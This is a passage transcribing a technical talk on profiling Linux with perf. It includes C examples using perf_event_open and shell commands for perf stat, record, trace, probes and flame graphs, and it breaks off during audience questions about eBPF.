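    #include <dirent.h>
    #include <stdio.h>

    int main(void)
    {
        const char *dir = "/sys/devices/cpu/events";
        DIR *d = opendir(dir);
        if (!d) {
            perror(dir);
            return 1;
        }
        struct dirent *e;
        while ((e = readdir(d)) != NULL) {
            if (e->d_name[0] == '.')
                continue;
            char path[512], buf[128] = "";
            snprintf(path, sizeof(path), "%s/%s", dir, e->d_name);
            FILE *f = fopen(path, "r");
            if (!f)
                continue;
            if (fgets(buf, sizeof(buf), f))
                printf("%-24s %s", e->d_name, buf);   /* e.g. cpu-cycles  event=0x3c */
            fclose(f);
        }
        closedir(d);
        return 0;
    }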
Now, each microarchitecture has a different number of actual counters that can be running at a particular point in time. Sometimes there's one, sometimes there's two, sometimes there's four. And the same counter can work in two distinct ways: one is what's called a counted interface and one is what's called a sampled interface. The counted interface is basically just counting: it counts the number of occurrences of that low-level event over a period of time. The sampled interface is a little bit different. There's a bit in the counter which, when set, will generate a local APIC interrupt when the counter overflows around to zero, and what happens then is that the instruction pointer in effect when the counter overflowed is recorded. So basically we can load a particularly high value into the counter, start it running, allow it to overflow, and get the instruction pointer that was in use at the time the counter overflowed. We use that to implement the sampling interface, whereby we can sample so many times per second to get an idea where the program counter is over time. The frequency for the sampled interface can be specified in two different ways. The first way is -F, which says take this many samples per second. The documentation will tell you that the default is 1024; it's not, it changed several years ago to be 4096. -c says, instead of doing X samples per second, generate a sample every X occurrences of the underlying event. So if I did -c 1000 with cycles, that would say generate me a sample every 1000 low-level cycle events from the hardware. So, the first time we're going to use one of the commands: perf top. perf top is a sampling view, so it is using the sampling counters, similar to the standard Unix top utility. In this case here, the first thing to bear in mind is that in the left-hand column we have the overhead. What this is saying is that while this sampling was taking place, 44.93% of the time a sample was taken it was taken inside the kernel function _raw_spin_lock, and 36.76% of the time it was taken in the kernel function sync_inodes_sb. So you look at this and you're like, oh my God, that's 44 and 36, that's almost 100, that's super busy. It's not. You need to go back to top in this case. Here I was running sync in a loop, and top will show you that in fact the CPU was 0.1% user, 4.1% system. So what you want to do in this case is add the -n option to perf top, and that will report back, in an additional column, the absolute number of samples that were taken to come up with that 44% and 36%. However, sometimes it is CPU bound. This is an example where I was running openssl speed, the default benchmark for OpenSSL, and it came back and said, okay, 51% of the time we were in this DES function, 26% of the time we were in another DES function, and so on down. And if I turn on the -n option here, it reports two orders of magnitude more samples per second being taken. So it's important to know, if you're looking at something in perf and you get freaked out by the number of samples, go back and figure out, you know, is it actually CPU bound? If you're not CPU bound, then you're not going to get very far poking around in perf top. So, yeah, it's possible through perf top to annotate hot code. There are three essential viewing modes in the perf utilities.
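Before getting to those viewing modes, here is roughly what the counted interface looks like underneath the tools, as a minimal sketch using the perf_event_open(2) syscall. Error handling is kept to a minimum, and the comment in the middle shows where the -F versus -c distinction ends up at the attribute level; this is an illustration, not a replacement for perf stat.

    #include <linux/perf_event.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <sys/syscall.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* There is no glibc wrapper for perf_event_open, so call it directly. */
    static long perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu,
                                int group_fd, unsigned long flags)
    {
        return syscall(__NR_perf_event_open, attr, pid, cpu, group_fd, flags);
    }

    int main(void)
    {
        struct perf_event_attr attr;
        memset(&attr, 0, sizeof(attr));
        attr.type = PERF_TYPE_HARDWARE;
        attr.size = sizeof(attr);
        attr.config = PERF_COUNT_HW_INSTRUCTIONS;  /* the "instructions" moniker */
        attr.disabled = 1;
        attr.exclude_kernel = 1;                   /* like the :u qualifier */
        attr.exclude_hv = 1;
        /* For the sampled mode one would instead set attr.freq = 1 together with
         * attr.sample_freq (the -F case), or attr.sample_period (the -c case),
         * and mmap a ring buffer to collect the samples; omitted here. */

        int fd = perf_event_open(&attr, 0 /* this task */, -1 /* any CPU */, -1, 0);
        if (fd < 0) {
            perror("perf_event_open");
            return 1;
        }
        ioctl(fd, PERF_EVENT_IOC_RESET, 0);
        ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);

        volatile uint64_t x = 0;
        for (uint64_t i = 0; i < 10 * 1000 * 1000; i++)
            x += i;                                /* the work being measured */

        ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
        uint64_t count = 0;
        if (read(fd, &count, sizeof(count)) == (ssize_t)sizeof(count))
            printf("instructions: %llu\n", (unsigned long long)count);
        close(fd);
        return 0;
    }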
There are three essential viewing modes in the perf utilities: the default view, which is a curses TUI view, a GTK view, and the standard IO view. I'm using the standard IO view in all these examples just because it's easier. But if you run perf top in the TUI or GTK view, it constantly refreshes itself over time, or with a certain delay, and it's possible to hit enter on an entry. So if we were running the graphical version, we could move the cursor down onto that 51.02% entry and hit enter, and it would open up a window and let me do an annotation view of the source code. That annotation view would show me, assembly line by assembly line and source line by source line, where in that function these samples break down. The problem is that it's refreshing in real time, so you've lost your context from the top level as to what was hot code. So I don't tend to use perf top very much. Another thing is that enabling call graphs can be really useful. What's happening with the sampling interface is that it's sampling the instruction pointer, so it's telling you, okay, I'm landing in this function, but it's not telling you why you are landing in this function. If you enable the -g option to perf top or perf record, then every time the instruction pointer is taken from the APIC interrupt, it will also take the stack trace. So then, when you're looking in the graphical tools, you can determine the separate paths on the stack that reach something. The reason I'm not talking about this much is that there's a later slide on what's called flame graphs, and flame graphs are a much better way of visualizing this call graph data; I'll show you that later on. The other thing is that getting call graphs working reliably is problematic. It depends on whether your code is built with a frame pointer or not. Most user space code is; our SUSE kernels are not, because we want that register available for general register allocation use, which gets us about a 5 to 10% performance gain. So we instead run the unwinder, which has an interesting history. That's great for decoding oopses and decoding panics, but it's not great running 4000 times a second inside the NMI handler, so this is going to have some problems. If you're doing a lot of call graph analysis using the -g option, you may want to build yourself a custom kernel. So I run perf top usually very infrequently. I'll fire it up if I think I'm CPU bound, get a very brief idea of what the display is showing me, and then I will run perf record. perf record is, again, sampling, using the counter sampling. And there are three primary command line forms here: perf record command, perf record -a command, and perf record -a. The first one is going to record samples, in user space and kernel space by default, only while command is running and only on the CPU that command is running on. perf record -a command records samples while command is running, but on all CPUs, so you can see if there are any side effects coming from other CPUs while command runs. And perf record -a just samples the entire system on all CPUs, regardless of any command. The default scope is to sample in kernel and user mode, and cpu-cycles is the default event. If you don't want to sample in both user and kernel mode, you can use the :u or the :k qualifier after the event.
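Roughly, those invocation forms look like this. It's a sketch, with ./command standing in for whatever workload you want to profile; the last line is the qualifier example the next sentence refers to.

```sh
# Sample only while ./command runs, only on the CPUs it runs on
perf record ./command

# Sample on all CPUs, but only while ./command runs
perf record -a ./command

# Sample the whole system until interrupted
perf record -a

# Restrict the default cycles event to user space with the :u qualifier
perf record -e cycles:u ./command
```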
And that tells the system, in this case, to sample CPU cycles only for user space and only when command is running on the CPU. So, an example. Here we're doing perf record, which is the sampling interface. I'm not doing frequency sampling; instead I'm saying, generate me a sample every 1000 occurrences of the low level event called instructions, and I'm running the Linpack benchmark. The first thing I do after that is say, okay, perf report -D. What happens is that perf record generates a file in your current directory called perf.data containing the sampling information that was collected, and perf report interprets that file. perf report -D just dumps it out in ASCII form, and I'm grepping for the number of occurrences of PERF_RECORD_SAMPLE. So there are 3,048,011 samples in that perf.data file. Now if we run perf report, using the -n option, which asks for the absolute sample count as well as the overhead, and using the standard IO viewer, you will notice that we have a much larger event count. That event count is exactly 1000 times the number of samples, because I asked for a sample every 1000 occurrences. Okay. So we can see that when a sample occurred, 48% of the time the function daxpy_r was on the CPU, and 40% of the time the function daxpy_ur was on the CPU. I mentioned previously that if you were using the GTK view or the TUI view, you could hit enter on one of those entries and it would take you into the annotation view. If you're on the standard IO console, you can instead run the separate command perf annotate. So I've run perf annotate and asked it to annotate just the symbol daxpy_r, which, if we go back, was the hot symbol: 48.04% of the samples were taken in that code. Because I built the code with -g, I have the C source and the assembly source interlaced with each other, and because I asked for the --print-line option, it gives me the matching line numbers in the file. So in the left hand column here we can see the sampling overhead relative to the 48% of the previous slide. We can see that on this line down here we've got 10.31% on this add instruction, 10.37% on this move, 17.5% on this movsd. And what this shows is that all of these assembly lines relate to line 599 in the source code, which is this dy[i] = dy[i] + da * dx[i] statement. So what this allows us to do is take our recorded data and drill down into a source level annotation view, to get an idea of what the hot code actually is on a line by line basis. Now, okay, in the previous example I ran perf record -c 1000 -e instructions:u, so I asked it to sample only in user space. In this case I've dropped that restriction, so I'm sampling in user and kernel space while this task runs. I don't have -a, so I'm still limiting the sampling to the CPU that Linpack is running on. What we see now is the same thing: daxpy_r and daxpy_ur are still the hot code. The dot in brackets means it's a user space sample, but now we have some kernel samples occurring. And if we look at them, we've got bottom half processing, we've got some soft IRQ processing, some IRQ processing, the idle CPU. What we don't have is any syscalls, which is not surprising, because Linpack is a floating point benchmark. If we were running a bunch of syscalls out of this task, we would see a lot of syscalls showing up in these kernel samples.
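Put together, the workflow from that example looks roughly like this. It's a sketch: the linpack binary, the -c 1000 period and the daxpy_r symbol are just the values from the speaker's example, and option spellings can vary a little between perf versions.

```sh
# Record: one sample every 1000 retired instructions, user space only
perf record -c 1000 -e instructions:u ./linpack

# Count the raw samples captured in perf.data
perf report -D | grep -c PERF_RECORD_SAMPLE

# Summarise by symbol, with absolute sample counts, on the console
perf report -n --stdio

# Drill into the hottest symbol, interleaving source and assembly
perf annotate --print-line --stdio daxpy_r
```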
So one of the common questions you get asked is: well, okay, great, I've got these performance counters and I've got all these events, but which events do I monitor? I'm going to talk briefly about that. One of the most common things you're going to want to monitor is what's called instructions per cycle. All of these CPUs are pipelined superscalar machines. There are multiple steps to executing an instruction: fetch the instruction from memory, decode it, execute it, fetch the memory operands and do the write back. These all occur in separate stages of the pipeline, and if there's enough instruction level parallelism, the CPU will try to fill the pipeline and you can execute more than one instruction per cycle. This is a common enough use of these two events. We've asked perf stat, and this is the first time we've seen perf stat. perf stat is the counted interface, so it is not doing sampling; instead it gives me the absolute count of the events that occurred while the task was running. I've asked it to limit its counting to just user space, for the events instructions and cycles. This is a common enough comparison that perf actually works out the ratio for us automatically, and it comes back and says: okay, in this case the task ran with 2.73 instructions per cycle. The more instructions per cycle, the better off you are. Another thing that is useful is cache misses relative to cache references. I have a genius piece of code here, and what it does is basically allocate an array of a million elements times a multiplier times the element size, which is eight bytes. So when mult is one, that's an eight million byte allocation; when mult is eight, that's a 64 megabyte allocation. It allocates that on the heap, and then it runs a loop randomly writing all over that array. The purpose is to test what the cache miss to cache reference ratio is. So once again, on the bottom here we run perf stat. We're asking for the cache-misses event moniker for user space only, and the cache-references moniker, also for user space only. Again, this is a common enough comparison that perf does the ratio for us, and it says we have a cache miss rate of 54%. One thing to bear in mind, and the reason I did this: the machine I was running on was an E5-2420 v2, which has a quarter megabyte of L2 cache per core, 1.5 megabytes of L2 on the die, and then a 15 megabyte last level L3 cache. So I've got a 15 megabyte last level cache and I'm doing a 64 megabyte allocation when mult is eight. If I drop mult down to one, that results in an eight megabyte allocation, which entirely fits within the 15 megabyte last level cache, and in that case it reports 0.001% cache misses. If I change mult to two, which puts me at 16 megabytes, slightly outside my cache size, I get a 0.003 miss rate.
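As commands, those two measurements look roughly like this. The ./task and ./badcache names are placeholders for the speaker's example programs; the event monikers and :u qualifiers are standard perf.

```sh
# Instructions per cycle: perf stat prints the "insn per cycle" ratio itself
perf stat -e instructions:u,cycles:u ./task

# Cache miss rate: perf stat prints misses as a percentage of all references
perf stat -e cache-misses:u,cache-references:u ./badcache
```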
Now, I had said earlier, when we looked at the output of perf list, that there was something called raw events. These are events that are not described by default in the perf list output. So once again I'm running the showevtinfo command from the libpfm-devel package, and I'm looking at this particular event, MEM_LOAD_UOPS_RETIRED. One thing to note: it is an Ivy Bridge specific microarchitectural event, so it is not part of the architectural perfmon set, and it counts memory load uops retired. And there are a bunch of umask qualifiers that I can specify to give me level one hits, level two hits, level three hits and misses, and so on. So I have a short loop here running the event-to-raw decoder that also comes with the libpfm-devel package, which will decode MEM_LOAD_UOPS_RETIRED:L2_HIT and the other qualifiers and give me the raw event codes back. So I run that and it gives me the four raw events: 5302d1, 5310d1, 5304d1, 5320d1. And I can now run perf stat specifying those four raw events, again scoping each one to user space, and it comes back and tells me that I have almost 3 million hits on the L2 cache, 412 million misses on the L2 cache, 187 million L3 hits, and 224 million L3 misses. One thing that's really important about this is this last column down here, in percentages. I mentioned that each microarchitecture has a different number of performance counters. This one actually has four, but not all performance counters can run all events, and it turns out that on this system only two of the counters can run these particular events. So I have four events and two counters that can run them, and the kernel is time slicing. While badcache is running, 50% of the time one counter is running 5302d1, 50.01% of the time it's running 5310d1, and so on. The kernel is telling you here: these are the ratios of the time that the event was physically running on a counter, and it then scales the numbers up to give you the effect of it running 100% of the time. If you don't like that, your options are to do multiple runs with fewer counters, or to pick a different event which can run on more of the performance monitoring counters.
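The resulting invocation looks roughly like this. It's a sketch: the raw codes are the ones quoted above and are specific to that Ivy Bridge machine, the badcache binary is the speaker's test program, and evt2raw is the libpfm example decoder the talk refers to, so the exact helper name and codes may differ on your setup.

```sh
# Decode one of the qualified event names into a raw code
evt2raw MEM_LOAD_UOPS_RETIRED:L2_HIT     # -> r5302d1 in this example

# Count all four raw codes, user space only; watch the multiplexing
# percentages perf prints when events outnumber usable counters
perf stat -e r5302d1:u,r5310d1:u,r5304d1:u,r5320d1:u ./badcache
```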
Another thing that is worth monitoring is branch misses relative to branch instructions. We talked about the CPU being pipelined, and the goal is to keep the pipeline full. When the CPU encounters a conditional branch, it has to say to itself: well, I want to keep the pipeline full, how do I do that? It does that by trying to predict which of the two ways you'll go at the conditional branch, and then it starts loading into the pipeline the instructions from the predicted branch target. If that prediction fails and you take the other branch, the CPU has to eject those instructions from the pipeline, and that hurts your instructions per cycle. So here we have some code again, a loop that ends up calling this function about 20 million times. All the code up on the top, which I've abbreviated so it fits on the slide, is basically just a randomized eight-way branch: each time we run through this code, we randomly take one of the eight possible branches, just to make it hard for the branch predictor. And we run it using perf stat, specifying the branches moniker for user space and the branch-misses moniker for user space. And I don't get back the results I expected, because I've got 490 million branches and 19 million branch misses, and I'm only calling this function func 20 million times, so I was expecting way more. The reason, anybody know the reason? The reason is that I'm asking perf stat to count the events for the entire execution of the branch8x program. Back in this thing here I have 20 million calls to func, so I have 20 million conditional branches occurring just for that for loop. This is basically skewing the results: I have a huge number of branches taking place elsewhere. But the ones I actually want to monitor, up here in func, there's no way to isolate, because perf stat is giving me the counted number of events for the entire code execution. We'll talk later about a way of doing this with PAPI. But one thing we can do instead of using the counted interface is run the same task under the sampled interface. So instead of running perf stat, we run perf record. We have no -F option, so by default it's going to take 4096 samples per second, and we ask it to sample branches and branch-misses for user space only. It comes back and tells us: okay, in this execution 42.5% of the total branch instructions executed were in the function func and 21% were in the function main; but 73.3% of all of the misses were in func and only 23% were in main. So this is showing us what we were hoping to see: because we're forcing branch prediction to fail inside func, we see a much higher share of the branch misses there. There is something called sampling skew, or skid. We talked about using the sampling counters: when the counter overflows, it records the instruction pointer. Because of the way pipelining takes place, the instruction pointer is not always guaranteed to be exact; it can be a few instructions off. So if you're looking at your assembly level output in perf annotate, the sample could be attributed to the wrong instruction. There is a way to solve that. On Intel it's called PEBS, precise event based sampling; on AMD it's called IBS, instruction based sampling. We saw previously that we could put the :u or the :k qualifier on an event; there's also a precision qualifier, :p, :pp and :ppp. If you specify, say, cpu-cycles:p, that says: okay, I accept the skid, but when the IP is off by a little bit, make it off by the same amount every time. :pp says please give me zero skid, but the kernel is free to not give you that. And :ppp says I require zero skid. Right now only levels zero, one and two are supported in perf. Also, not every event supports PEBS. Again, if you run the showevtinfo command that we've been using, you will see a keyword, precise, in the flags for a counter, and that means it supports PEBS. So, moving ahead. Remember we looked at the output of perf list and we had software events, hardware events, and also trace points. These are the static ftrace code points that the kernel developers have deemed to be of interest for debugging. If I do perf list tracepoint on my system, I get 1486 different entries for existing kernel trace point events. I've just broken it down and chopped a bunch out here, but we have block:block_bio_backmerge from the block subsystem, we have sched:sched_switch, which fires whenever the scheduler performs a task switch, and for every syscall in the system we have a trace point for its entry and a trace point for its exit. We also have a file under /sys/kernel/debug/tracing/events/, then the event name, called format. And if we cat that file, the print line at the bottom shows us what the kernel is going to output into the ring buffer for ftrace every time that trace point fires, if it's enabled.
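A sketch of poking at those trace points, assuming a typical setup where debugfs is mounted at /sys/kernel/debug (you'll generally need root). The sys_enter_write example matches the one used on the next slides.

```sh
# List just the trace point events perf knows about
perf list tracepoint | less

# Look at what one trace point will log to the ftrace ring buffer
cat /sys/kernel/debug/tracing/events/syscalls/sys_enter_write/format
```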
So we can do some cool things with these trace points. They're primarily there for use with ftrace, but perf integrates with them. This first command is using the counted interface, perf stat, and it says: -a, so count system wide, every time any of the sys_enter_* trace points fires (that's a glob, so any entry point for any system call), and sleep 30. So over 30 seconds, basically tell me how many times a system call was entered, system wide. Question from the audience: is that wildcard matching done in userland? Yes, it's done in userland, because it actually expands out and you get a line in the output per syscall. Good question. In the next one I've dropped the -a, so I'm not doing system wide any more: perf stat, give me a count of the number of times the sched:sched_switch event occurred while benchmark was running. In other words, how many times did the scheduler involuntarily context switch me out while benchmark was running? Now you might say to yourself: okay, we've got these trace points, they're at fixed locations in the kernel, so why would I have any interest in perf record, which is a sampling based interface that samples the instruction pointer a certain number of times a second? I already know where these trace points are, so there's not a lot of interest in sampling the instruction pointer. But it does have a use. In this case I'm doing perf record -a, so I'm sampling system wide, and I've asked it to give me call stacks, so every time a sample is taken it gives me the stack that led to that point. The event is syscalls:sys_enter_write, the entry point for the write syscall. Now we go back to that format file I talked about on the previous slide: one of the fields is count, and that is the count argument to your write syscall. So I can add an optional filter on to that. What this says is: sample every time the sys_enter_write trace point is encountered, system wide, but only when the count argument is greater than 1024, and for each of those show me the kernel stack that led to that trace point. That can be a really useful way of combining perf record with trace points. Now, a question: do you have any idea how much running this as a system wide collection impacts the system? It does have a cost, but ftrace is designed to be extremely low overhead, and you're only activating one trace point at that point; I'm only activating the sys_enter_write trace point. If you asked it to trace every single syscall, that's going to have an effect, and if you enable every single event, it's going to have an effect. But ftrace is designed to be low overhead. It is significantly less overhead than you would think; it's designed to be turned on and produce lots and lots of data with minimal system effects. But obviously not zero.
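To recap those three examples as commands. This is a sketch: sleep 30 and ./benchmark are stand-ins for whatever you want to measure, and the filter field name comes from the trace point's format file shown earlier.

```sh
# Count every syscall entry, system wide, for 30 seconds
perf stat -a -e 'syscalls:sys_enter_*' sleep 30

# Count how often the scheduler switched this task out while it ran
perf stat -e sched:sched_switch ./benchmark

# Record stacks system wide, but only for write() calls bigger than 1 KiB
# (runs until interrupted with Ctrl-C)
perf record -a -g -e syscalls:sys_enter_write --filter 'count > 1024'
```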
These trace points are useful enough that there's actually a perf subcommand called perf trace. This is basically doing the same thing as strace, but it's not using the ptrace API, and that has some interesting side effects. Number one, it is way lower overhead than ptrace; ptrace has huge overhead. Number two, it can monitor system wide; we've already seen that you can do -a, whereas with strace all you can do is run a particular command or attach to an existing process. And it can filter based on syscall duration. So what I've got going on here is a dd command reading from /dev/zero, writing to /tmp, one kilobyte block size, ten writes, and I asked perf trace to show me the syscalls that took longer than one millisecond. It comes back and says none of them did. Next I add conv=fdatasync on to the end, which says: when you finish, do a sync syscall. So now we see one line of output: a sync call that took 6.035 milliseconds. And finally, instead of fdatasync I can say oflag=sync, which says I want synchronous writes all the time, for data and metadata; every write should be fully synchronous. So now when I run it, every single write syscall shows up: 6.127 milliseconds for the first, and the rest of them all over one millisecond. So this is an example of using perf trace, which is built on these lower level trace point events, to automatically give me an idea of which syscalls are taking place on the system and how long they take. There's also a really cool -S option, which gives me a summary of all the system calls: it produces this table of how many times each syscall was made, the total, the minimum, the maximum, the standard deviation and so on, for all of the syscalls executed during the run. Finally, I said these ftrace points are predetermined by the kernel developers. If you want to add another one, you need to go into the kernel source code and put in a new trace point. Sometimes you don't want to do that; sometimes you just want to dynamically monitor something new. So in this case I'm running perf probe on _copy_from_user, which is the kernel code point that copies data across the syscall boundary from user space. I do perf probe on it, it adds what's called a kprobe, and it comes back and says: okay, this probe is now called probe:_copy_from_user, and you can use it with the sampling interface if you want to. Instead, I chose to run it with the counted interface, perf stat -a, for a duration of one second. What that tells me is how many times, in a one second period, system wide, we entered the _copy_from_user function. Finally, the last slide on the basic stuff: perf script. Remember that perf record produces a perf.data file in your current directory, which perf report operates on. perf script, by default, will produce an ASCII dump of that perf.data in a format suitable for parsing with other tools. There are already a bunch of pre-canned scripts on the system; you can run perf script -l on your system right now and it will list the pre-canned Python and Perl scripts that have already been created. So you say, well, I'd like to write a new one, and that sounds kind of daunting because I don't know what's going on. Fortunately there's a great option, perf script -g python (or perl), which will open the perf.data file, look at what types of events are recorded in it, and generate you a skeleton Python or Perl script with an entry point for each one of those events.
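Those examples look roughly like this on the command line. It's a sketch: the one millisecond threshold, the /tmp path and the probe point are the ones from the talk, most of these need root, and exact option spellings can differ between perf versions.

```sh
# Show only syscalls slower than 1 ms, for three variants of the same dd
perf trace --duration 1 dd if=/dev/zero of=/tmp/out bs=1k count=10
perf trace --duration 1 dd if=/dev/zero of=/tmp/out bs=1k count=10 conv=fdatasync
perf trace --duration 1 dd if=/dev/zero of=/tmp/out bs=1k count=10 oflag=sync

# Summary table of every syscall the command made
perf trace -S dd if=/dev/zero of=/tmp/out bs=1k count=10

# Dynamic probe: count entries to _copy_from_user for one second, system wide
perf probe _copy_from_user
perf stat -a -e probe:_copy_from_user sleep 1

# Pre-canned perf.data report scripts, and a skeleton to write your own
perf script -l
perf script -g python    # generates a skeleton script with a handler per event type
```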
So all you have to do then is go and fill it in with whatever code you want, install it into the system, and then you can use it by saying perf script record your-script-name and perf script report your-script-name, and you have that script built into the system. Okay, so any questions? Okay, so I've got some advanced stuff that I wanted to talk about. Remember that slide where we first talked about call graphs and how they were problematic? One of the problems with call graphs is that there can be so much data that you can't make sense of it in the annotation view. With perf annotate, remember, the command we ran broke things down by line number, but there's so much data that you can't figure out what's going on. So a guy called Brendan Gregg, who's a performance analyst at Netflix, has come up with this thing called flame graphs, and that's the URL there. What we do is run the record interface system wide with -g, so I want call graphs; the event is cycles, kernel space only sampling; and I'm running an scp of a 10 gigabyte file from my workstation to another host. After that we end up with a perf.data file in the current directory. We could run perf report on that if we wanted; instead we do perf script and pipe it through the two scripts Brendan has come up with, and that produces an interactive SVG file that we can open in Firefox. And it looks like this. So this is a flame graph. It's kind of complicated. Each box here (don't worry about the colors, they're not actually meaningful) is an entry on the stack, and the Y axis reflects the depth of the stack: higher entries are children, lower entries are parents. The X axis doesn't show time in the normal sense that we'd expect. Instead it is sorted alphabetically, and the width of a box shows the amount of time, in terms of number of samples, that that stack entry showed up on the stack. The bottom entry here is our main function, so sure enough, 100% of the time it showed up at the bottom of the stack. Then the next entry on the stack, half the time, was one thing, and the other half of the time it was swapper. What tends to happen is that it forms these peaks. What those indicate, in this case here, is that tcp_v4_rcv doesn't in fact do a lot of work itself; mostly it accumulates samples from its children running above it. But occasionally we get entries like this guy here. We're interested in looking at leaves like this: that leaf is at the top of the stack, and it's hot for a significant number of samples, because the X axis is the number of samples. And that's copy_from_user, which makes sense: we're running an scp of a 10 gigabyte file, so we're sucking the data out of the file system and sending it over the network. So this shows us a breakdown of all of the paths, and that is extremely useful if you're trying to get a high level visualization of your call graph data.
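The flame graph pipeline described above looks roughly like this, assuming you've cloned Brendan Gregg's FlameGraph repository (https://github.com/brendangregg/FlameGraph); the two script names come from that repository, and the sleep duration and scp workload are just placeholders.

```sh
# Sample kernel-side cycles system wide, with call stacks, while scp runs
perf record -a -g -e cycles:k -- sleep 60    # run the scp in parallel

# Fold the stacks and render an interactive SVG
perf script | ./FlameGraph/stackcollapse-perf.pl | \
    ./FlameGraph/flamegraph.pl > scp.svg
firefox scp.svg
```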
The next thing I'm going to talk about is something called PAPI, or self monitoring. PAPI is the Performance Application Programming Interface, and it's hosted at the URL there. It was originally intended to run over perfmon, and then when perfmon ran into a brick wall it got retasked to run over perf. But because it was running over perfmon, and perfmon exposed the raw event names while perf doesn't, they came up with their own event aliases, called event presets, which have no correspondence with the perf monikers. What PAPI gives you is a library that allows you to insert calls at particular points in your source code to say: okay, start running these counters now; at this point in the code, read this counter; do some work; read the counter again, subtract the difference, and report the result to me. So if you remember the example function we had a few slides back, the function called func with the eight-way branch in it: we tried to run perf stat on it and got a huge, skewed set of results. The obvious thing to do is to put a PAPI call above the eight-way branch saying read me the counters, do the eight-way branch, then another PAPI call to read the counters again and display the difference. Unfortunately, that doesn't work well either, because the library calls into PAPI have an enormous number of branches in them themselves. So PAPI is somewhat useful for wrapping pieces of code inside your own code, but it has limitations. There is an excellent kernel implementation of self monitoring that was added in these two mainline commits, and if you want to know how it works, you need to look at the self test code: there's a file called rdpmc.c in the perf self tests in the kernel source. What that code basically does is map a page from the kernel, for consistency, and then allow you to directly execute rdpmc from your user space code. You can only use it to monitor yourself, not anybody else. The advantage, which is too complicated to go into here, is that it's not library code, so you have an idea of the overhead of that code and how it's going to perturb the performance counter results you're getting. Oh, and there's an excellent paper by Vince Weaver, who's one of the PAPI developers; this paper here is worth reading if you're interested, all about the performance overhead of perf versus perfmon. Another thing worth talking about is off-CPU analysis. All the stuff we've been talking about so far is: I'm running on the CPU, so I'm monitoring events, cache misses, branch misses relative to branch instructions. That's really interesting stuff, but sometimes it's just as interesting to find out why your code is not running. Generally speaking, the goal is to have your code scheduled and running on the CPU as often as possible, and there are lots of reasons why it won't be: disk I/O, some kind of task to task synchronization, the effects of the virtual memory subsystem on your code, or involuntary context switching. There's a really excellent analysis of this: Brendan Gregg has written a page showing how to use perf trace plus perf inject to monitor the scheduling system calls, and you can produce flame graphs with this approach, showing the effects of the scheduler on your code and how much time your code spends off the CPU. I'm just mentioning this here, it's an advanced topic, but it's just as important to know why you're not running as to know why you are running. And the final slide: virtualization. If you're virtualizing, you need to virtualize all of this performance monitoring hardware underneath the guest, and that is hard.
So if you're on Xen and you're in a domU and you run perf list, you're going to see software events and trace point events, but you're not going to see any of the performance counter events, because they're not virtualized. Things are better in QEMU if you're using KVM, the Kernel Virtual Machine. There's a wonderfully undocumented option: QEMU has a -cpu option, so you can say -cpu qemu64,pmu=on, where qemu64 is the default CPU. That's not documented anywhere that I could find, but what it does is tell QEMU to virtualize the CPUID instruction to report back that, yes, this CPU supports architectural perfmon, versions 1 through 4. And then in your guest you can run perf list and you will see those event monikers for cpu-cycles and so on and so forth. You can also do -cpu host, which fully exposes the underlying host hardware to the guest; in that case you can see your microarchitectural events as well, so you can use the raw events that we showed. If you're stuck on Xen there is slight salvation: there's a subcommand of perf called perf kvm. It does sampling only, so you cannot use the counted interface. There's no visibility into individual guests; it can break things down by host or by guest, cumulatively. But it allows you to sample what's going on inside the host space or inside the guest space. It is kind of hokey, though, because you have to copy the symbols and module information files from the guest into the host, which is awkward. But if you're running Xen, perf kvm is about as far as you can go. If you're running KVM with QEMU, things are a lot better. But remember, it's being virtualized, so the results may vary compared to bare metal. Anyway, that's my talk. I hope it was okay. Any questions? Question: so you can use perf pretty much only if your workload is CPU bound, otherwise you don't? The question was: can you use perf only if your workload is CPU bound? That is not true. The perf trace points, for example: if you use the scheduler trace points through the perf commands, you can expose a lot of information about the code that's running that has nothing to do with it being CPU bound. And I talked about the page I mentioned; I would encourage you to read it, because in it Brendan Gregg talks about using perf trace and also perf inject, similar to what you could do with SystemTap, to do off-CPU analysis: determining when your code is not running on the CPU. So you can use perf in cases where the workload is not CPU bound. Now, perf top, perf record and perf stat are generally going to be focused on CPU bound code, but the perf trace side of things has nothing to do with being CPU bound. Does that answer your question? Yes. Thanks. Any other questions? Yes: is perf completely multi-architecture aware, then? Oh, good point. Yes. It started off being x86_64 only, but now, and this is one of the differences between perf and perfmon, the logic for handling the underlying hardware counters of each microarchitecture lives in the kernel tree for every architecture: PowerPC, ARM, s390, x86. With perfmon this was all stuffed out in libpfm; now it's all in the kernel. So yes, it is supported on s390, PowerPC, ARM, ARM64. It can be considered a general purpose replacement for OProfile, basically.
The one architecture it doesn't work on is IA-64, which is still using perfmon, so there is no perf for IA-64. If you find yourself working on that, you've got to go and download libpfm and pfmon and use those. Thanks. Question: if the code does not run on the CPU, where can it run? What are the other scenarios, for instance a GPU, or what else? I must admit I don't know about the GPU case; I don't think there is any perf support for analyzing performance on GPUs. But to the question of whether, if it's not on the CPU, it's always on the GPU: no. If it's not on the CPU, you could be waiting to be scheduled, so you're waiting for something: you're on some sort of I/O wait channel, you're waiting for virtual memory, you're waiting. It's like I mentioned on this slide here, going back to it. There are many reasons why you may not be running on the CPU. You might be waiting for disk I/O to complete. You've performed some kind of synchronization with another thread or another task and you're waiting for that synchronization to complete. You've performed some operation that triggered a page fault and you're waiting for that to come back. When that happens, the kernel is going to schedule you off the CPU and schedule somebody else on who can run, rather than having you busy loop doing nothing. And the other thing is that the kernel will schedule you off the CPU simply because it's got 500 other tasks that it has to get onto the CPU. So there are lots of reasons. That's also the main difference between perf record command and perf record -a command: with -a you're going to see the effects of the kernel doing other bookkeeping type work while your command was running, because one of the things that happens while your command is running is that you're being scheduled on and off the CPU. If you don't use the -a option, and you don't sample the kernel events, if you limit yourself to just user space sampling, you won't see that. Does that make sense? Yeah, yeah. Thanks a lot for clarifying. No, you're welcome. This is Giovanni, by the way. Hello, everybody. I've heard about another tool, the Berkeley Packet Filter. Yes. It was originally in the networking domain, but it's now expanding towards performance monitoring, and I wanted to know what the overlap is. Excellent. I'm going to do a talk on that at the Labs conference, but what he's talking about is something called eBPF. Has anybody here run tcpdump? tcpdump uses the old Berkeley Packet Filter, and what happened in the kernel more recently is that something called eBPF came up, which is basically a small stack based programming language that gets JITed inside kernel space. You can do all kinds of cool things inside this JITed code, and there is a new perf interface to eBPF that lets you integrate with it. I could talk for three or four hours on perf, but there is a perf interface to eBPF and you can 